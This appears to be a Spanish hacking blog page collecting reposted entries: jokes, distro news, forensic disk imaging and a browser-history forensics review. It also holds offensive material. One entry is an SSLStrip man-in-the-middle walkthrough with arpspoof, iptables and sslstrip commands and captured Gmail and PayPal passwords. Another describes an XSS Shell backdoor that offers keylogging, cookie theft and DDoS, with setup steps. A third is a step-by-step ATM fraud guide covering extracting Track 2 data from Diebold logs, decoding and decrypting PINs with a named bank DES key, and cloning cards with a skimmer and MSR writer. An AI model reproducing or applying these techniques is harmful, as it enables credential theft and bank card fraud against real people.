Banner 1

Feliz navidad año 2011

0 comentarios
Hola.

Parece ayer cuando estábamos despidiendo el año 2009 y esperando el nuevo 2010 donde se estipularon algunas de las cosas que iba hacer en este año, lastimosamente las labores diarias no me dejaron el tiempo suficiente para dedicarme al blog.

Espero que este nuevo año me deje el tiempo que deseo para seguir con el proyecto, actualizarlo en los temas de seguridad, forense y demás información de sistemas que nos pueda interesar.

Este nuevo año la temática del blog ira mas enfatizada en análisis forense sobre entornos windows, también auditoria sobre ellos.

Por la parte de seguridad la realizare desde un celular n900 donde tendré bactrack mobil instalado para realizar las pruebas.

Solo me queda decirles feliz año a las personas que aun lean el blog y sobre todo que se cumplan todas sus metas.

Saludos roboticos
 

GnackTrack

2 comentarios
Buenas noches.

Para las personas que no conozcan esta distribución de linux, esta se puede decir que es la versión backtrack pero con escritorio gnome

Muchos tenemos ese sabor maluco de trabajar con kde, cabe anotar que la velocidad que ofrece es muy buena y sobre todo la funcionalidad pero muchos estamos acostumbrados a trabajar sobre gnome casi tiempo total y aunque los pentest no son diarios seria bueno tener nuestras herramientas del día a día junto con nuestras herramientas para auditoria.

Así encontré esta distribución que planeo sacarle todo el provecho sacando un esquema de funcionalidad con respecto a backtrack.

Les dejo la pagina oficial del proyecto para que lo visiten.

Página oficial:

http://www.gnacktrack.co.uk/index.php

Descargas:

-Imagen ISO:
http://www.gnacktrack.co.uk/downloads/GnackTrackR4.iso

-Imagen para VMWare:
http://www.gnacktrack.co.uk/downloads/GnackTrackR4.7z

PD: gracias pablo por avisarn y visitar el blog

Noticias sobre el avance de la academia virtual

0 comentarios
Buenas noches.

Después de mucho tiempo ausente y el cierre por parte de los proveedores del hosting a latinohack, es tiempo de dar una vuelta y empezar de nuevo.

La academia es un hecho, lo que no se sabe es la fecha de lanzamiento en todo caso en enero del 2011 estaremos en la apertura para que no os perdáis este evento.

Los cursos seran los mismos , las temáticas cambiaran un poco siempre buscando la mejor calidad educativa.

Saludos a todos y espero seguir copiando.

Academia Vritual LH De nuevo Online

1 comentarios
Buenas Tardes.

Asi como el titulo lo dice, la Academia Virtual de LatinoHack se abre de nuevo al publico dando comienzo al curso de Ethical Hacker totalmente gratis.

Esperamos no tener mas inconvenientes tenicos y seguir adelante con el proyecto.

http://labs.latinohack.com/

Saludos Roboticos

los mandamientos del ingeniero

0 comentarios
Cortesia del Compañero Nikolas :D.

---------------------------------------------------------------------------------------------------------

1. No tendrás vida personal, familiar o sentimental

2. No verás a tu hijo crecer.

3. No tendrás días feriados, fines de semana o cualquier otro tipo de días de descanso.

4. Tendrás gastritis, si tienes suerte. Normalmente, tendrás úlcera.

5. La prisa será tu único amigo y tus refecciones principales serán los sándwich, las pizzas y el china in a box.

6. Tus cabellos se volverán blancos antes de tiempo, si te sobran cabellos.

7. Tu salud mental será puesta en jaque antes que completes 5 años de trabajo.

8. Dormir será considerado período de descanso, luego, no dormirás bien, nunca.

9. Trabajo será tu asunto preferido, tal vez el único.

10. Las personas serán divididas en 2 tipos: las que entienden de Ingeniería y las que no entienden. Y verás gracia en eso.

11. La máquina de café será tu mejor colega de trabajo, pero, la cafeína no te hará más efecto.

12. Happy Hours serán excelentes oportunidades de tener algún tipo de contacto con otras personas locas como tú.

13. Tendrás sueños con cálculos, proveedores o clientes, y no raro, resolverás problemas de trabajo en este período de sueño.

14. Exhibirás ojeras como trofeo de guerra.


Fuente:
http://sitodofuerabueno.wordpress.com/2009/02/16/los-mandamientos-del-ingeniero/

Por qué algunos hombres prefieren perros y no esposas

0 comentarios

 

 
1.  Mientras más tarde llegues, más se emociona el perro al verte.

 

 

 
2. Los perros no se dan cuenta si los llamas por otro nombre

 

 

 
3. A los perros les gusta que dejes muchas cosas tiradas en el piso.

 

 

 
4. Los padres del perro nunca te visitan.

 

 

 
5. Los perros están de acuerdo en que debes levantar la voz para dejar en claro tu punto de vista.

 

 

 
6. Nunca tienes que esperar por el perro, ellos están listos las 24 horas del día.

 

 

 
7. Los perros encuentran divertido cuando tu llegas ebrio..

 

 

 
8. A los perros les gusta ir de cacería o de pesca.

 

 

 
9. Un perro nuca te despierta en la noche para preguntarte, "Si yo muero conseguirías otro perro?"

 

 

 

 
10. Si un perro tiene bebés los puedes anunciar en el periódico y regalarlos.

 

 

 
11. Un perro te deja ponerle un collar con picos sin que te diga pervertido.

 

 

 
12. Si un perro detecta el olor de otro perro en tí no se enoja, sólo piensa que es interesante.

 

 

 
13. A los perros les encanta viajar en la parte de atrás de una pickup.

 

 

 
Y por último pero ciertamente no menos importante:

 

 

 
14. Si el perro te deja, no se lleva la mitad de tus cosas.

 

 

 
Test Final: Encierra a tu esposa y a tu perro en la cajuela de tu coche por una hora. Después abre la cajuela y observa quién está más feliz de verte.

Desmitificando la seguridad de HTTPS con SSLStrip

0 comentarios
Este es un buen post que vi en la red de dragon hecho por seidfreed.

----------------------------------------------------------------------------------------------------
Hola!
Muy buenas a todos/as!
Utilizamos hoy en día Internet para muchas cosas, mirar nuestro correo, mantenernos comunicados con la gente, conexiones a bancos etc…
Nadie nos ha enseñado a navegar de manera segura pero conocemos conceptos como:

  1. Siempre que vayas a poner datos de carácter personal que la conexión sea segura que ponga HTTPS.
  2. Que nos fijemos en la imagen del candadito
Algo así como esto:

HTTPS no es tan seguro como nos creemos, tiene debilidades, haremos una prueba de concepto.
El diagrama de red sería el siguiente

Este es el escenario planteado.
Suponemos que conocemos la IP del atacante.
Habilitamos el Forwanding en la máquina atacante
root@bt:~# echo “1″ > /proc/sys/net/ipv4/ip_forward
Ahora mediante ARPSPOOF haremos un ataque man in the middle
root@bt:~# arpspoof -i eth0 -t 192.168.78.137 192.168.78.2
Veremos como se hace el ataque de man in the middle
0:c:29:72:9a:32 0:c:29:e4:a8:97 0806 42: arp reply 192.168.78.2 is-at 0:c:29:72:9a:32
Primero hemos de poner la IP de la máquina a la que atacamos y después la IP del router
Ahora mediante IPTABLES hacemos la redirección de puertos
root@bt:~# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
Ahora activamos SSLSTRIP
root@bt:~# sslstrip -w passwords
sslstrip 0.6 by Moxie Marlinspike running…
Escribiremos todos lo que recojamos de SSLSTRIP en un fichero llamado passwords
Ahora mediante TAIL iremos viendo lo que sale por pantalla
root@bt:~# tail -f passwords
Ahora cuando la máquina atacante acceda a su correo, a GMAIL por ejemplo
Veremos como nos saca el password en texto plano
2010-07-24 00:36:26,739 SECURE POST Data (www.google.com):
ltmpl=default&ltmplcache=2&continue=http%3A%2F%2Fm ail.google.com%2Fmail%2F%3F&service=mail&rm=false& dsh=6669774865561864179&ltmpl=default&ltmpl=defaul t&scc=1&timeStmp=&secTok=&GALX=dPSLG5jykg8&Email=mriverolopez&Passwd=CONTRASEÑA&rmShown=1&signIn=Acceder&asts=
Y ahí tenemos la dirección de email y la contraseña, este caso lo hemos echo con gmail, probemos por ejemplo con…paypal
2010-07-24 01:47:25,907 SECURE POST Data (www.paypal.com):
login_cmd=&login_params=&login_email=Seifreed&login_password=CONTRASEÑA&target_page=0&submit.x=
Ya hemos visto lo sencillo que es capturar los datos de acceso aunque la conexión sea por HTTPS.
La pregunta es.. ¿ Como saber si estamos sufriendo un man in the middle ?
Una de las maneras sería haciendo un tracert

Como véis primero nos saldría la máquina que no está haciendo el man in the middle y luego nuestro router.
Así que tened cuidadín, desde que ubicaciones accedéis a vuestros datos privados.
Un saludo __________________
Mi web:
http://www.seifreed.wordpress.com

Asociación cultural y tecnológica
http://www.badiatech.org

Cursos de informática
aula.badiatech.org

Wikipedia asociación
wiki.badiatech.org

FUENTE:http://comunidad.dragonjar.org/f184/desmitificando-la-seguridad-de-https-con-sslstrip-10325/

Cosas para Tener En Cuenta (Manual para entender a las mujers y hombres)

0 comentarios
MANUAL PRACTICO PARA ENTENDER EL ESPAÑOL DE LAS...!MUJERES!!!!!



NO = Sí.

SI = No.

TAL VEZ = No

LO SIENTO, PERO... = Lo volveré a hacer igual

DECIDE TU = Pero haz lo que digo yo.

ERES LIBRE DE HACER LO QUE QUIERAS = Ni se te ocurra hacerlo.

HAZ LO QUE QUIERAS = Pero lo pagarás caro.

NO, NO ESTOY ENOJADA = Por supuesto que estoy enojada......., IMBECIL!!

TE ESTAS DURMIENDO? = No te duermas!!.

ESTA NOCHE ESTAS MUY CARIÑOSO = No tengo ganas de hacer el amor.

ESTOY GORDA (FLACA)? = Dime que estoy Buenísima.

APAGA LA LUZ = Tengo Celulitis

QUIERO CAMBIAR ESTAS CORTINITAS = y las alfombras...y la pintura...y los muebles...

ES QUE ESTA COCINA ES TAN CHIQUITA = Quiero una casa nueva.

ME AMAS? = Te voy a pedir algo.

QUE TANTO ME AMAS? = y cuesta mucho dinero

NECESITARIAMOS = Yo Quiero.

TENEMOS QUE HABLAR = Necesito quejarme de algo.

CREO QUE NO NOS COMUNICAMOS LO SUFICIENTE = Tienes que estar de acuerdo conmigo

-----------------------------------------------------------------------------------------------------------------------------------



MANUAL PRACTICO PARA ENTENDER EL ESPAÑOL DE LOS...!HOMBRES!

TENGO HAMBRE = Tengo hambre

TENGO SUEÑO = Tengo sueño

ESTOY CANSADO = estoy cansado

HABLEMOS = Estoy tratando de impresionarte, para que pienses que soy un hombre profundo y accedas a tener sexo conmigo

PARECES TENSA, TE DOY UN MASAJE? = Primero te meto mano, después quiero sexo contigo.

ME CONCEDES ESTA PIEZA? = Quiero sexo contigo

TE GUSTARIA IR AL CINE CONMIGO = Quiero sexo contigo

QUIERES CENAR CONMIGO HOY EN LA NOCHE = Quiero sexo contigo

TE PUEDO LLAMAR EL VIERNES? = Quiero sexo contigo

TE QUIERES CASAR CONMIGO = Quiero que sea ilegal para tí acostarte con otro hombre que no sea yo.

(DE COMPRAS) SI, TE QUEDA BONITO, QUE BONITO ESE VESTIDO = Agárralo de una vez y vámonos de esta friega.

SI, TE QUEDA BIEN = Qué buena estás!!.

EL NUEVO CORTE = te quedaba mejor el anterior.

SI, TE QUEDA BIEN EL NUEVO CORTE = $30.000 pa' la basura!!.

PERO CUAL ES EL PROBLEMA? = No entiendo la tragedia.

QUE TE PASA? = Cuál trauma psicológico auto-inventado te afecta hoy

ESTAS BRAVA? = me imagino que esta noche, nada de sexo.

ESTOY ABURRIDO = Tenemos sexo?.

TE AMO = Necesito sexo YA!!.

YO TAMBIEN TE AMO =OK, Estás contenta?.Podemos comenzar con el sexo? 
En realidad los manuales son 100% practicos como lo pueden ver , se garantiza un 99.9999% de que lo aqui contenido es real. Fuente: http://www.taringa.net/posts/humor/7220699/Cosas-para-Tener-En-Cuenta-_D-No-Te-La-Creas_-xD.html

Xss Shell[Explicacion+Video+Descarga]

2 comentarios
 Este articulo tambien lo encontre via disodelared en el blog de Overflow , me parese buen tema asi que lo comparto.

------------------------------------------------------------------------------------------------------------------

Esto es una traduccion de google.
Fuente:darknet.org.uk

XSS Shell es una puerta trasera XSS gran alcance que permite obtener de forma interactiva el control de un cross-site scripting (XSS) en una aplicación web. Demuestra el poder real y el daño de los ataques de cross-site scripting.

¿QUE ES LA SHELL XSS?


XSS Shell es de gran alcance una puerta trasera XSS y gerente zombi. Este concepto presentado por XSS-proxy (http://xss-proxy.sourceforge.net/). Normalmente, en ataques XSS atacante tiene una oportunidad, en forma interactiva XSS Shell puede enviar peticiones y obtener respuestas de la víctima, puede puerta trasera de la página.

Puedes robar autenticación básica, usted puede saltarse restricciones de la propiedad intelectual en los paneles de administración, puede DDoS algunos sistemas con una permanente vulnerabilidad XSS etc posibilidades de ataque son limitados con las ideas. Básicamente esta herramienta demuestra que se puede hacer más con XSS.

CARACTERISTICAS

XSS Shell tiene varias características para tener acceso a toda víctima. También puede simplemente añadir sus propios comandos.

La mayoría de las características se pueden habilitar o deshabilitar desde la configuración o puede ser ajustado desde el código fuente.

Características:

* Páginas de regeneración
* Keylogger
* Mouse Logger (puntos clic actual DOM)

Incorporado en los mandos:

* Obtener datos Keylogger
* Obtener la página actual (actual prestados DOM / captura de pantalla como)
* Obtener Cookie
* Ejecutar JavaScript suministrado (eval)
* Obtener Portapapeles (sólo para IE)
* Obtener dirección IP interna (JVM sólo Firefox)
* Revise las víctimas visitaron historial de URL
* DDoS
* Fuerza al navegador de la víctima de Crash

Instalacion
-
XSS Shell utiliza ASP + base de datos MS Access como backend, pero puedes simplemente puerto en cualquier otra solución de servidor. Sólo tiene que seguir con el protocolo de comunicación simple.


Instalar la interfaz de administración;

1. Copiar "xssshell" carpeta en su servidor web
2. Copiar "db" a un lugar seguro (por debajo de la raíz)
3. Configurar "ruta de acceso base de datos" de "xssshell / db.asp"
4. Modificar fuertemente codificados contraseña en db.asp [contraseña por defecto es:] w00t
5. Ahora usted puede tener acceso a la interfaz de administración de algo como http:// [YOURHOST] / xssshell /


Configurar XSS Shell para la comunicación;
1. Abrir xssshell.asp
2. Set "SERVER" variable a la carpeta donde se encuentra XSSShell. i.e: "http:// [YOURHOST] / xssshell /";
3. Asegúrese de revisar "ME", "Conexión", "COMMANDS_URL" variables. Si ha cambiado los nombres de archivo, nombres de carpetas o algún tipo de configuración diferente que necesita modificarlos.

Ahora abra su interfaz de administración desde el navegador,
Para probarlo, basta con modificar "sample_victim / default.asp" código fuente y reemplazar "http://attacker:81/release/xssshell.js" URL con su propia URL del tipo XSS Shell. Abrir "sample_victim" carpeta en cualquier otro navegador y puede ser subido a otro servidor.

Ahora debería poder ver un zombi en la interfaz de administración. Sólo tiene que escribir algo en "parámetros" área de texto y haga clic en "alert ()". Usted debe ver un mensaje de alerta en el navegador de la víctima.

Video De Una Xss Shell Funcionando



Descarga
http://www.megaupload.com/?d=XZMGB24Z

Hacking Atm`s cajeros automaticos

1 comentarios
Esto lo encontre via diosdelared en el blog de ze0max , me paresio interezante y lo comparto con el blog.

--------------------------------------------------------------------------------------------------------------

 
FUENTE PARA SI QUIEREN LEERLO MEJOR AQUI NO SE ILUSTRA MUCHO
http://zer0max.atspace.com/




La informacion aqui presentada es solo para fines educativos no me hago responsable de los hechos
Bueno para comenzar explicare conceptos de los Atm's.

Atm's cajeros automaticos:Un cajero automático, de sus siglas en inglés "Automated Teller Machine" es un ordenador
modificado con 2 interfaces de administración, en el 90% de los casos.ya que hay atm´s portátiles,pero el tema de hoy nos compete a tratar sobre esos
atm´s que están pegados a las paredes de los bancos y que tanta curiosidad y misterio ocultan.

Estructura de un atm:
interfaz usuario que esta formado por el monitor ,teclado, lector de banda magnetica, tickera y dispensador de billetes!!

Banco: institucion financiera que administra divisas y a el dinero de sus clientes, estos no fabrican cajeros automaticos.

Empresas fabricadoras de Atm's :DIEBOLD - WINCOR NIXDORF - NCR e INTERBOLD.Hay muchas mas pero estas son las mas importantes.

Proceso de operacion en atm's interfaz-cliente:
1.-Inserta tarjeta de credito o debito
2.-Digita PIN(numero confidencial).
3.Realiza su operacion bancaria

Tecnicos de Atm's: realizan cursos en la empresa fabricante de cajeros que le vendió al banco.

En estos tres procesos el atm lee la informacion contenida en la banda magnetica que como algunos saben se les llama TRACKS o DUMPS pero en este caso
es específicamente el TRACK 2, luego verifica el PIN y lo encripta y si los datos son correctos, que sucede?, pues existe una gran red bancaria llamada
CIRRUS,SWITCH 7B, MAESTRO, CONEXUS nuestro banco conecta con el y nos permite realizar la operación que hayamos seleccionado.

Hay otra interface de administración que está oculta detrás de la pared, y contiene: monitor, conector para teclado, puertos usb, hasta floopy xD, caja de recarga de billetes!! y una especie de tickera en algunos modelos. Es obvio que los usuarios no lo pueden tocar, pero hay personal que si lo hace. Son los técnicos de atm´s, que hicieron cursos en la empresa fabricante de cajeros que le vendió al banco.

En la interface se ocultan muchas cosas y dependiendo de nuestra suerte y podamos contactar con algun tecnico,imaginense si esto ocurriera xdd , pss si lo es
asi de verdad,yo zer0max conosco gente que hace este tipo de trabajo y quiero decirles que hay mucha gente en esto, mas adelante les platico mas de esto.

Bueno primero mas que nada hablaremos de DIEBOLD, que quizas ya lo conoscas es una empresa muldialmente conocida,esta se encarga de vender atm´s a todos los bancos del mundo,estos ATMS son facil de conocer porque tienen el logotipo de DIEBOL impreso en la interfaz de usuario.


Que es lo que pasa cuando insertan los clientes sus tarjetas de debito y hacen una operación?
Lo que sucede es que su transacion es logueada en el HD del atm, asi como lo oyen los atms tienen discos duros,claro son ordenadores modificados pero estos
que sistema operativo creen que trae?, linux? no para nada traeN un simple windows xp upss ...

aqui una captura de una ventana de win xp en un ATM lol


La empresa diebold ha lanzado muchos modelos, entre ellos la serie optiva, con procesadores PIV, con Windows XP instalado! y corren el sistema AGILIS ,que es un programa fabricado por la DIEBOLD y que se puede modificar para que cuando te acerques al ATM veas el logo de tu banco diciéndote: Inserte su tarjeta.

Habiamos comentado que los ATM'S tienen un disco duro,pues ahi en ese disco duro se almacenan las transaciones de los clientes en forma secuencial.

Vino el nesock inserto su tarjeta en el ATM, digitó su PIN e hizo una consulta.
El atm logueo la operacion de esta manera:

;xxxxxxxxxxxxxxxx=xxxxxxxxxxxxxxxxxxxx? <<

A1B2C3D4E5F601FF<<< se cifró el PIN (1234) fue lo que insertó "es solo un ejemplo"

operación: CONSULTA<<<] se registró el tipo de transacción

Luego vino Bx que estaba atras de nesock esperando turno inserto su tarjeta en el ATM, digitó su PIN e hizo un retiro

;xxxxxxxxxxxxxxxx=xxxxxxxxxxxxxxxxxxxx? <<< se leyó el track 2 de la tarjeta

FFFFAAAA541D2EAF<<

operación: RETIRO <<< se registró el tipo de transacción

Asi secuencialmente se guardan esos logs en el disco duro, y el log empieza a crecer.
Logico esto no es el formato en que se guardan los logs,este formato varia segun el fabricante.
Un log de la DIEBOLD no será igual en formato a un log de la WINCOR NIXDORF, y así sucesivamente.

Encriptacion PIN

Qué tipo de cifrado se usa para cifrar el PIN?
Usan DES, Data Encryption Standar, DES se basa en una key (una llave de 16 dígitos en hexa) para cifrar y desencriptar, hay bancos que usan 2DES y 3DES que se basan en 2 y 3 llaves y nos hacen la tarea un poco más difícil.

En resumen, si tenemos esa llave de 16 dígitos en hexa, podemos desencriptar el número de identificación personal que tipio el usuario, y con el TRACK 2 podemos hacer un clon de la tarjeta de débito, pero el principal reto, es obtener el log. ya vamos a eso, xD.

Primero quisiera hablar un poco del proceso de clonacion de tarjetas de credito-debito:

Material necesario

SKIMER


Con este aparito pequeño deslizamos una tarjeta sobre el y los tracks de la banda magnetica se guardan sobre el,este se conecta ala computadora y a quemar tarjetas.
Como las quemo? pss observa ..

MSR


El MSR se encarga de quemar la tarjeta,osea grabar los tracks en la nueva tarjeta en blanco, con la ayuda de un software


Ya tenemos todo vamos con la tarjeta en blanco a un atm la

Track2+tarjeta en blanco+msr+sofwarer+pin obtenido+tecnico atm =Mucho Cash en atm xddd

A pero no he explicado como decifrar el PIN es la intencion

Voy a decir que ese log en la serie optiva de la DIEBOLD, se encuentra en el archivo message.trc dentro de la ruta c:\diebold\css\
haciendo un análisis del message.trc tendríamos:

message.trc de la diebold están registrados entre el ; y el ?

6012883350096006=11111200000004919321

Este track2 contiene la numeración que está impresa en la tarjeta de debito: 6012883350096006

Guauuuu un banco xd , psss cada entidad tiene su propia numeración, pero el punto es que con este track, podemos construir una tarjeta de debito idéntica,
o sea un clon(como les comente arriba). También podemos apreciar el PIN que está cifrado y que es : =254=967:658==>

Para poder desencriptarlo necesitamos conocer la nomenclatura para llevarlo a hexa.
La nomenclatura es la siguiente y según veo se comporta como un estándar bancario

A es :
B es ;
C es <
D es =
E es >
F es ?

Con esta pequeña tabla podemos traducir: =254=967:658==> a AD254D967A658DDE

Una vez que tenemos el PIN en sus 16 dígitos hexa, necesitamos la llave DES (KEY DES) para desencriptarlo. En este caso la llave DES para desencriptarlo es
0123456789abcdef

es algo facil no? bueno esa era la llave DES que usaba BANESCO jaja, creo saber que le dieron durisimo este año.

Como la desencriptamos? no creo que tenga que responder eso, hay muchos programas para hacerlo que usan el algoritmo DES. como crypto calculator III , atmdes, safedes, etc.
El PIN desencriptado sería 6158FFFFFFFFFFFF
donde 6158 sería el PIN de cuatro dígitos que tipio el cliente, y F sería el path.
Con estos datos ya podríamos hacer una consulta, ya que hay hardware para grabar en bandas magnéticas, como la famosa msr206, etc.
Pienso extender esto ya que merece interés, doy esta información porque pienso que se debe saber el por qué de las cosas. ¿Son tan seguros los bancos administrando nuestro dinero? me temo que no xD.

Antes de despedirme quiero contar una anecdota.

Yo zer0max tengo un amigo de aqui de mi ciudad el men se dedica a esto,me acuerdo andaba en banking conmigo hace tiempo con bancomer pero nos fallo por falta de tiempo,ahora el contactó con un tecnico de ATM que se encarga de sacar los logs del disco duro del ATM y unos amigos que concocen Desencriptan el PIN usando el DESKEY del banco dado.


FUENTE PARA SI QUIEREN LEERLO MEJOR AQUI NO SE ILUSTRA MUCHO
http://zer0max.atspace.com/

 

Adquisición de evidencias

0 comentarios
Otra muy buena entrada de neofito.

Ya hemos hablado aquí de WinFE, una distribución live de Windows Vista orientada principalmente al campo del computer forensics. Vamos a sacarle partido en estas líneas y desarrollar la forma de utilizarla para la adquisición de evidencias, clonado del sistema objetivo de análisis o imaging, que queda como más mejor.

No estoy diciendo que sea mejor utilizar WinFE en lugar de los clásicos live-CD de Linux, ni es mi intención iniciar una de esas batallas que al final no conducen a nada; cada cual utilice aquello con lo que se sienta más comodo, pero al menos que conozca las alternativas.

Pero dado que no soy analista forense y por lo tanto no tengo la necesidad de este tipo de proceso, ¿como es que empezó todo esto?

Introducción, presentación o planteamiento

En mi trabajo son numerosas las ocasiones en que me encuentro con PCs prácticamente inusables, atestados hasta las trancas por todo tipo de fauna y flora que parece que les hayan puesto un felpudito en la entrada de esos de "Bienvenidos, estáis en vuestra casa".

Como soy de natural curioso enseguida me emociono pensando en iniciar un análisis que me permita detectar cuando empezó la infección, como se llevó a cabo y cual ha sido el alcance, pero el tiempo apremia y los clientes quieren un trabajo "bueno, bonito y barato"; ésto último sin duda, y principalmente por mis carencias, elimina de un plumazo cualquier atisbo de ilusión.

Sin embargo últimamente, y con el beneplácito del cliente, intento clonar el disco afectado del modo más "forénsico" posible (diós que mal suena la palabreja) para ya en mi casa, mucho más tranquilo y con la disponibilidad que consigo arrancarle a mi ya de por sí mermado tiempo libre, meterme en harina. Pero esa es otra historia que, queráis o no, acabaré contándoos otro día.

La unica duda que me quedaba era si WinFE realmente respetaba la máxima del análisis forense la cual establece que, a ser posible, no deben alterarse las evidencias. Para resolverla calculé antes de empezar el proceso la suma md5 para el disco objeto de clonado volviendo a calcular a posteriori la suma md5. Utilizando clonezilla, una vez dentro de la shell y con el sistema cargado en RAM, basta con un simple comando:
# md5sum /dev/sda

Finalizada la segunda ejecución del comando la suma md5 final coincide con la suma md5 inicial, así que el disco no ha sido alterado.

Desarrollo, complicación o nudo

Pongamos que tenemos un disco A de 160 GB extraído del PC víctima y un disco B de 500 GB conectados ambos a nuestra estación de trabajo, un simple PC, con una unidad de CD/DVD. Durante el encendido nos aseguramos de entrar en la pantalla de la BIOS para configurar el arranque desde esta última.

Ni que decir tiene que si por error el ordenador arrancase utilizando el sistema operativo instalado en el disco A podríamos despedirnos de utilizarlo como prueba en un proceso judicial, al menos siguiendo al pie de la letra el manual de las buenas prácticas para todo analista forense, o al menos aquel que por tal se tenga.

Con nuestro flamante WinFE recién tostadito en la unidad de CD/DVD, y creado según los pasos indicados aquí, arrancamos el sistema hasta alcanzar el prompt de la línea de comandos, nuestro querido y a menudo denostado cmd.

Por las características intrínsecas y deseables asociadas a WinFE ninguno de los discos duros de que dispone el sistema ha sido accedido, automontado o alterado en modo alguno. Teniendo en cuenta que nuestro objetivo es clonar el disco A o víctima en el disco B o destino y dado que hemos sido aplicados y hemos saneado previamente este último utilizando DBAN, por eso de no contaminar las evidencias, primero tendremos que particionarlo, asignarle una letra de unidad y formatearlo. La serie de comandos necesarios para ello quedaría como sigue:
X:\windows\system32>diskpart
 
Microsoft DiskPart versión 6.0.6000
Copyright (C) 1999-2007 Microsoft Corporation.
En el equipo: MININT-E1NAUD0
 
DISKPART> list disk
 
  Núm Disco  Estado      Tamaño   Disp     Din  Gpt
  ---------- ----------  -------  -------  ---  ---
  Disco 0    En pantall   149 GB    37 GB
  Disco 1    En pantall   466 GB   466 GB
 
DISKPART> select disk 1
 
El disco 1 es ahora el disco seleccionado.
 
DISKPART> create partition primary
 
DiskPart ha creado satisfactoriamente la partición especificada.
 
DISKPART> assign letter=K
 
DiskPart asignó correctamente una letra de unidad o punto de montaje.
 
DISKPART> format fs=ntfs label=images quick
 
  100 por ciento completado
 
DiskPart formateó el volumen correctamente.
 
DISKPART> exit
 
Saliendo de DiskPart...
 
X:\windows\system32>

Ahora que tenemos preparado el disco de destino y que éste puede ser accedido por cualquiera de las utilidades lanzadas desde WinFE ya podemos iniciar el clonado, para el cual utilizaré por su simplicidad y bajo coste (0 si tenemos en cuenta que es gratuita) FTK Imager Lite. Recordar que no tenemos entorno gráfico así que lo lanzaremos desde la línea de comandos:
X:\windows\system32>"..\Program Files\FTK\FTK Imager.exe"

Una vez iniciado el programa menú "File", "Create Disk Image..."; en la nueva ventana de diálogo marco "Physical Drive" y en el siguiente desplegable selecciono la entrada "\\.\PHYSICALDRIVE0 - [160GB]" y pulso "Finish", con lo que llego a la ventana de control del proceso de clonado o "Create Image" tal como reza en la barra de título.

Pulsando el botón "Add..." comienzo con la selección de las características de la imagen resultante así que primero "Raw (dd)" y "Siguiente", indico los datos de interés para el registro del caso (Case Number, Evidence Number, Unique Description, Examiner y Notes) y "Siguiente" para llegar al penúltimo paso.

Para el campo "Image Destination Folder" paso del botón "Browse" ya que no sirve de nada ejecutándose sobre un live-CD y manualmente introduzco "K:\", o lo que es lo mismo la letra de unidad asignada anteriormente mediante DiskPart; para el campo "Image Filename" introduzco "winmediacenter" (o lo que mejor se adapte); para el campo "Image Fragment Size (MB)" introduzco 0, evitando de esa forma que la imagen resultante termine dividida y para el resto de parámetros servirán los que aparecen por defecto.

De vuelta en la ventana "Create Image" dejo marcado "Verify images after they are created" y si quiero saber de antemano el tiempo que empleará el proceso de clonado marco "Precalculate Progress Statistics". Pulsar el botón "Start" provoca el inicio del proceso que, en este caso, termina tras aproximadamente una hora y media.

Desenlace final

El proceso finaliza con la ventana "Drive/Image Verify Results", la cual incluye los hashes MD5 y SHA1 de la imagen así como la cuenta de sectores clonados, si se han encontrado sectores defectuosos y el nombre final para la imagen, "winmediacenter.001". No será necesario que apuntemos los valores ya que si una vez cerrado "FTK Imager" examinamos el contenido del disco B o destino:
X:\windows\system32>dir K:\
 El volumen de la unidad K es IMAGES
 El número de serie del volumen es: C05A-87A0
 
 Directorio de K:\
 
22/05/2010  17:06    160.041.885.696  winmediacenter.001
18/05/2010  19:42              1.074  winmediacenter.001.txt
               2 archivos 160.041.886.770 bytes
               0 dirs  339.954.167.808 bytes libres

encontraremos un fichero de texto, winmediacenter.001.txt, con la información anterior.

Para apagar la estación de trabajo bastará con cortar la corriente (vamos, tirar del cable) o mas elegantemente:
X:\windows\system32>wpeutil shutdown

Y por último un documento muy detallado, encontrado en Forensic Focus, sobre WinFE y todos los detalles necesarios para su creación y personalización.

Hasta pronto, espero.


FUENTE: http://neosysforensics.blogspot.com/2010/05/adquisicion-de-evidencias.html

Web Historian

0 comentarios




Hola lectores,

Hace mucho tiempo que voy siguiendo la evolución de la empresa MANDIANT que dispone de muchos productos curiosos y productos FREE de lo más interesantes.

Hoy quiero hablar de una herramienta que me ha ayudado en la búsqueda de evidencias forenses en la navegación web y que es de una ayuda incalculable  (¡¡ Bravo por los chicos de MANDIANT !!)

Ni que decir tiene existen muchas herramientas en modo comando como 'pasco' o 'galleta', pero he seleccionado esta por su sencillez y rapidez a la hora de elaborar un informe forense.

Estamos hablando de Web Historian.

Web Historian es un programa que permite a un investigador reunir, mostrar y analizar datos de la navegación que se haya producido en un equipo. Más allá de esta simple definición, la herramienta ofrece una interfaz gráfica pero simplista de ver y navegar con grandes volúmenes de datos.

Tal vez la característica más potente es la capacidad de relacionar y ofrecer múltiples puntos de vista de los datos (incluyendo gráficos y línea de tiempo) a través del analizador y la herramienta web de perfiles, con la esperanza de que los investigadores podamos llegar a conclusiones acerca de los datos que nos proporciona.

En la siguiente imágen podemos apreciar la cantidad de navegadores que soporta



Una vez que pulsamos el boton de 'start' comienza el escaneo del equipo en busca de la información de navegación, también es interesante resaltar que podemos copiar los ficheros de historico de otro equipo al que previamente hemos clonado y obtenido sus huellas, para posteriormente tratarlo en el equipo del investigador con el objeto de no alterar posibles pruebas.


Esta pantalla es el resultado del escaneo: (se han tapado datos por motivos de confidencialidad)





Desde ella podemos filtrar, en busca de objetos, imágenes, campos ocultos, etc. Como se puede apreciar dispone de muchos de ellos ya predefinidos y también podemos crearnos los nuestros.

Otra de las carácterisiticas importantes es la obtención de miniaturas ya algunos navegadores graban una instantánea de la imagen de las páginas web que se han accedido. Actualmente, Chrome y Safari son los únicos navegadores que recogen imágenes en miniaturas.

Para ver las miniaturas, disponemos de la ficha "thumbnails". 




Website Analyzer

El analizador de sitios web es una representación gráfica muy útil para reducir el tiempo de análisis de grandes conjuntos de datos del historial web con estadísticas e informes visuales.


Para iniciarlo tenemos en Herramientas-> Analizar, en esta versión de momento hay cuatro informes que se pueden ejecutar sobre los datos. Para ejecutar un informe, primero debemos cargar los datos del historial web.

 
Cualquier informe generado o gráficos se pueden guardar como una imagen PNG para su inclusión en un informe externo.Los informes que puede generar son variados, por ejemplo el circular por dominio permite ver la frecuencia de visita de cada sitio web en el conjunto de datos, y el de línea de tiempo es perfecto para ver la frecuencia por horas.


 Y por último otra de las grandes utilidades es el Web Profiler, que permite disponer de una visión completa del sitio visitado.

  
Lo dicho, otra herramienta (gratuita) que debemos de tener en nuestra caja de herramientas.

Podemos descargarnos esta utilidad desde la web de MANDIANT desde aquí :

